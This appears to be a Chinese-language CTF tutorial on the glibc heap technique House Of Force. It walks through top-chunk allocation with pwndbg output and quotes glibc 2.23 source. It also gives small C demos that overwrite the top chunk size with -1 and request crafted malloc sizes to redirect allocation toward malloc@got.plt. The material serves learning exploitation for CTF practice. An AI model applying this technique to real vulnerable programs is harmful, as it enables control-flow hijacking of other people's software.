2026-05-23 2026-05-23

House Of Force（topchunk）

什么是 House Of Force？

_House Of Force（HoF）_的命名，核心是用「House」指代堆内存空间、「Force」指代 “强制篡改堆布局以劫持分配” 的核心攻击逻辑。House Of Force 是一种堆的利用方法其主要原理是控制 heap 中的 top_chunk 并 malloc 来达到控制任意内存的空间。既然是控制 top_chunk，那就先了解一下 top_chunk：

top_chunk

top_chunk 是 glibc 的 ptmalloc 内存管理中，位于堆物理地址最高处的特殊空闲 chunk，不属于任何 bin 链表，是内存分配的 “最后备选”，还负责堆扩容与内存归还操作系统。

位置：处于堆顶，brk 指针位于其顶部，是堆中最后一块空闲块。

申请内存时，依次查询 tcache → fastbins → smallbins → largebins → unsorted bin。

上述均无匹配时，尝试从 top_chunk 切割；若 top_chunk 不足，则调用 sysmalloc 扩容。

切割后，剩余部分作为新的 top_chunk，分配部分返回给用户。

引入实例 top_chunk_demo

我们先通过一个例子去了解 top_chunk 的分配过程，之后再去讲解 HOF 的利用，这样会更清晰。

#include<stdio.h>
#include<malloc.h>
int main(){
    malloc(0x10);
    malloc(0x20);
    malloc(0x30);
}

先对文件进行检查，发现什么都没有开

ctfshow@ubuntu:~/Desktop$ checksec top_chunk_demo
[*] '/home/ctfshow/Desktop/top_chunk_demo'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments
ctfshow@ubuntu:~/Desktop$

用 gdb 调试，在 main 函数下断点，运行到常见第一个堆块之后，看一下堆情况：

───────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────────────────────────────────────────────
In file: /home/kali/Desktop/top_chunk_demo.c:5
   1 #include<stdio.h>
   2 #include<malloc.h>
   3 int main(){
   4         malloc(0x10);
 ► 5         malloc(0x20);
   6         malloc(0x30);
   7         return 0;
   8 } 
   9         
───────────────────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────────────────
00:0000│ rbp rsp 0x7fffffffdca0 ◂— 1
01:0008│+008     0x7fffffffdca8 —▸ 0x7ffff7c29f68 (__libc_start_call_main+120) ◂— mov edi, eax
02:0010│+010     0x7fffffffdcb0 ◂— 0
03:0018│+018     0x7fffffffdcb8 —▸ 0x400526 (main) ◂— push rbp
04:0020│+020     0x7fffffffdcc0 ◂— 0x1ffffdda0
05:0028│+028     0x7fffffffdcc8 —▸ 0x7fffffffddb8 —▸ 0x7fffffffe15a ◂— '/home/kali/Desktop/top_chunk_demo'
06:0030│+030     0x7fffffffdcd0 —▸ 0x7fffffffddb8 —▸ 0x7fffffffe15a ◂— '/home/kali/Desktop/top_chunk_demo'
07:0038│+038     0x7fffffffdcd8 ◂— 0xf0b5c6b0a73a3ac1
─────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────────
 ► 0         0x400534 main+14
   1   0x7ffff7c29f68 __libc_start_call_main+120
   2   0x7ffff7c2a025 __libc_start_main+133
   3         0x400459 _start+41
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> heap
Support for tcache large bins (a GLIBC 2.42 addition) has not been fully implemented. PR contributions are highly appreciated!
Allocated chunk | PREV_INUSE
Addr: 0x602000
Size: 0x300 (with flag bits: 0x301)

Allocated chunk | PREV_INUSE
Addr: 0x602300
Size: 0x20 (with flag bits: 0x21)

Top chunk | PREV_INUSE
Addr: 0x602320
Size: 0x20ce0 (with flag bits: 0x20ce1)

pwndbg> x/20gx 0x602300
0x602300:       0x0000000000000000      0x0000000000000021==>chunk1
0x602310:       0x0000000000000000      0x0000000000000000
0x602320:       0x0000000000000000      0x0000000000020ce1==>top_chunk
0x602330:       0x0000000000000000      0x0000000000000000

此时 top_chunk 的大小为 0x20ce1，我们再进行 malloc(0x20)看一看对快的内存大小：

───────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────────────────────────────────────────────
In file: /home/kali/Desktop/top_chunk_demo.c:6
   1 #include<stdio.h>
   2 #include<malloc.h>
   3 int main(){
   4         malloc(0x10);
   5         malloc(0x20);
 ► 6         malloc(0x30);
   7         return 0;
   8 }        
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x602000
Size: 0x300 (with flag bits: 0x301)

Allocated chunk | PREV_INUSE
Addr: 0x602300
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x602320
Size: 0x30 (with flag bits: 0x31)

Top chunk | PREV_INUSE
Addr: 0x602350
Size: 0x20cb0 (with flag bits: 0x20cb1)

pwndbg> x/20gx 0x602300
0x602300:       0x0000000000000000      0x0000000000000021==>chunk1
0x602310:       0x0000000000000000      0x0000000000000000
0x602320:       0x0000000000000000      0x0000000000000031==>chunk2
0x602330:       0x0000000000000000      0x0000000000000000
0x602340:       0x0000000000000000      0x0000000000000000
0x602350:       0x0000000000000000      0x0000000000020cb1==>top_chunk
0x602360:       0x0000000000000000      0x0000000000000000

对比第一次 malloc 的堆情况，我们发现，系统新开辟了一个 0x31 大小的内存空间，但是 top_chunk_size 却减小了 0x30 的大小，我们继续调试看看执行完第三次 malloc 的堆块：

───────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────────────────────────────────────────────
In file: /home/kali/Desktop/top_chunk_demo.c:7
   1 #include<stdio.h>
   2 #include<malloc.h>
   3 int main(){
   4         malloc(0x10);
   5         malloc(0x20);
   6         malloc(0x30);
 ► 7         return 0;
   8 } 
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x602000
Size: 0x300 (with flag bits: 0x301)

Allocated chunk | PREV_INUSE
Addr: 0x602300
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x602320
Size: 0x30 (with flag bits: 0x31)

Allocated chunk | PREV_INUSE
Addr: 0x602350
Size: 0x40 (with flag bits: 0x41)

Top chunk | PREV_INUSE
Addr: 0x602390
Size: 0x20c70 (with flag bits: 0x20c71)

pwndbg> x/30gx 0x602300
0x602300:       0x0000000000000000      0x0000000000000021==>chunk1
0x602310:       0x0000000000000000      0x0000000000000000
0x602320:       0x0000000000000000      0x0000000000000031==>chunk2
0x602330:       0x0000000000000000      0x0000000000000000
0x602340:       0x0000000000000000      0x0000000000000000
0x602350:       0x0000000000000000      0x0000000000000041==>chunk3
0x602360:       0x0000000000000000      0x0000000000000000
0x602370:       0x0000000000000000      0x0000000000000000
0x602380:       0x0000000000000000      0x0000000000000000
0x602390:       0x0000000000000000      0x0000000000020c71==>top_chunk
0x6023a0:       0x0000000000000000      0x0000000000000000
0x6023b0:       0x0000000000000000      0x0000000000000000

可以发现，系统又开辟了一个 0x41 大小的内存空间，此时 top_chunk_size 减小了 0x40。

tip）：这里对多出的 1 做个解释：观察到的top_chunk_size 减少 0x40、但实际分配 0x41 空间，核心原因是因为 glibc 堆的 size 段低 3 位是标志位，并不参与实际内存大小计算。

综上得出：在分配比 top_chunk 小的 chunk 的时候，会从 top_chunk 中分割，并且 top_chunk 向下移动（：：前提是没有可以使用的 bins,否则先从 bins 中取）

House Of Force 利用原理

如果一个堆漏洞想要通过 House Of Force 进行利用，就必须满足以下条件：

能够以溢出等方式控制 top_chunk 的 size 域且能够自由控制堆分配尺寸的大小。

我们知道，在分配堆块时，如果所有空闲的 bins 都无法满足需求，就会从 top_chunk 中分割出相应的大小作为堆块的空间。如果我们可以控制 top_chunk_size 的值，就可以使 top_chunk 指向我们所期望的任何位置，就相当于是一次任意地址写。

不过在 glibc 中，会对用户请求的大小和 top_chunk 现有的 size 进行验证：

libc 2.23 源码 3793-3809 行

victim = av->top;                           //获取当前top_chunk的大小
size = chunksize (victim);                  //计算top_chunk的大小
//如果在分割之后，其大小仍然满足chunk的最小大小，那么就可以直接进行分割
if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
    {
        remainder_size = size - nb;
        remainder = chunk_at_offset (victim, nb);
        av->top = remainder;                //top_chunk指针更新
        set_head (victim, nb | PREV_INUSE |
                    (av != &main_arena ? NON_MAIN_ARENA : 0));
        set_head (remainder, remainder_size | PREV_INUSE);
                                            //更新top_chunk_size
        check_malloced_chunk (av, victim, nb);
        void *p = chunk2mem (victim);
        alloc_perturb (p, bytes);
        return p;
     }

如果 top_chunk_size 被篡改成很大的值，就可以轻松通过这个验证。若要绕过这个验证，我们一般的做法是将 top_chunk_siza 修改为-1，因为在进行比较的时候会将 size 转换为无符号数，也就是将-1 转换为 unsigned long 中最大的时候，因此无论如何都可以通过验证。验证通过之后，会将 top_chunk 指针进行更新，接下来的堆块就会分配到这个位置。用户只要控制了这个指针就相当于控制了任意地址。与此同时 top_chunk 的 size 也会更新。

如果我们想要下次再指定位置分配大小为 x 的 chunk，我们需要确保 remainder_size 不小于 x+MINSIZE

HOF 向前控制内存

下面会举例说明 House Of Force 的利用：

该例子是通过 House Of Force 来篡改 malloc@got.plt 实现劫持程序流程。

示例的源代码如下：top_chunk_demo1

#include<stdio.h>
int main()
{
	long *ptr,*ptr2;
	ptr=malloc(0x10);
	ptr=(long *)(((long)ptr)+24);
	*ptr=-1;        // <=== 这里把top chunk的size域改为0xffffffffffffffff
	malloc(-4120);  // <=== 减小top chunk指针
	malloc(0x10);   // <=== 分配块实现任意地址写
	return 0;
}

ptr=(long *)(((long)ptr)+24);：让 ptr 精准指向 top_chunk 的 size 域，直接调试到这一步之前更清晰：ptr 本身指向的是就是 chunk1 的 data 域即第 16 字节处，+16+8=24 恰好修改到 top_chunk 的 size 字节。

In file: /home/kali/Desktop/top_chunk_demo1.c:6
    1 #include<stdio.h>
    2 int main()
    3 {
    4     long *ptr,*ptr2;
    5     ptr=malloc(0x10);
 ►  6     ptr=(long *)(((long)ptr)+24);
    7     *ptr=-1;        // <=== 这里把top chunk的size域改为0xffffffffffffffff
    8     malloc(-4120);  // <=== 减小top chunk指针
    9     malloc(0x10);   // <=== 分配块实现任意地址写
   10     return 0;
   11 }
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/20gx 0x602300
0x602300:       0x0000000000000000      0x0000000000000021==>chunk1
0x602310:       0x0000000000000000 ptr  0x0000000000000000
0x602320:       0x0000000000000000      0x0000000000020ce1==>top_chunk
0x602330:       0x0000000000000000      0x0000000000000000
0x602340:       0x0000000000000000      0x0000000000000000
0x602350:       0x0000000000000000      0x0000000000000000
0x602360:       0x0000000000000000      0x0000000000000000

我们按照程序运行过程继续调试

In file: /home/kali/Desktop/top_chunk_demo1.c:7
    1 #include<stdio.h>
    2 int main()
    3 {
    4     long *ptr,*ptr2;
    5     ptr=malloc(0x10);
    6     ptr=(long *)(((long)ptr)+24);
 ►  7     *ptr=-1;        // <=== 这里把top chunk的size域改为0xffffffffffffffff
    8     malloc(-4120);  // <=== 减小top chunk指针
    9     malloc(0x10);   // <=== 分配块实现任意地址写
   10     return 0;
   11 }
pwndbg> x/20gx 0x602300
0x602300:       0x0000000000000000      0x0000000000000021==>chunk1
0x602310:       0x0000000000000000      0x0000000000000000
0x602320:       0x0000000000000000      0x0000000000020ce1==>ptr==>top_chunk
0x602330:       0x0000000000000000      0x0000000000000000
0x602340:       0x0000000000000000      0x0000000000000000
0x602350:       0x0000000000000000      0x0000000000000000
0x602360:       0x0000000000000000      0x0000000000000000

执行到运行完*ptr=-1，我们可以看见 top_chunk 的 size 域已经被修改为最大无符号长整型

    7     *ptr=-1;        // <=== 这里把top chunk的size域改为0xffffffffffffffff
 ►  8     malloc(-4120);  // <=== 减小top chunk指针
    9     malloc(0x10);   // <=== 分配块实现任意地址写
   10     return 0;
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/20gx 0x602300
0x602300:       0x0000000000000000      0x0000000000000021
0x602310:       0x0000000000000000      0x0000000000000000
0x602320:       0x0000000000000000      0xffffffffffffffff
0x602330:       0x0000000000000000      0x0000000000000000
0x602340:       0x0000000000000000      0x0000000000000000
0x602350:       0x0000000000000000      0x0000000000000000

在我们真正的题目当中，这一步可以通过堆溢出漏洞来实现，直接赋值-1 即可。

我们一开始的目标是利用 HOF 篡改 malloc@got.plt 实现劫持程序流程，之后就要执行 malloc(-4120);

继续运行到执行完 malloc(-4120)之后，再进行 malloc（0x10）就可以控制 malloc@got.plt 了

由于本机可能因为版本原因，无法达到程序运行完预想的效果，就不再演示，在实际题目中思路是相同的。

HOF 向后控制内存

#include<stdio.h>
int main()
{
    long *ptr,*ptr2;
    ptr=malloc(0x10);
    ptr=(long *)(((long)ptr)+24);
    *ptr=-1;                 //<=== 修改top chunk size
    malloc(140737345551056); //<=== 增大top chunk指针
    malloc(0x10);
    return 0;
}

思路一样，增大 topchunk 指针，使其往后指，控制关键地址

更新: 2026-03-17 21:31:53
原文: https://www.yuque.com/idcm/wnemg9/vt5mrvnq9qeeukc7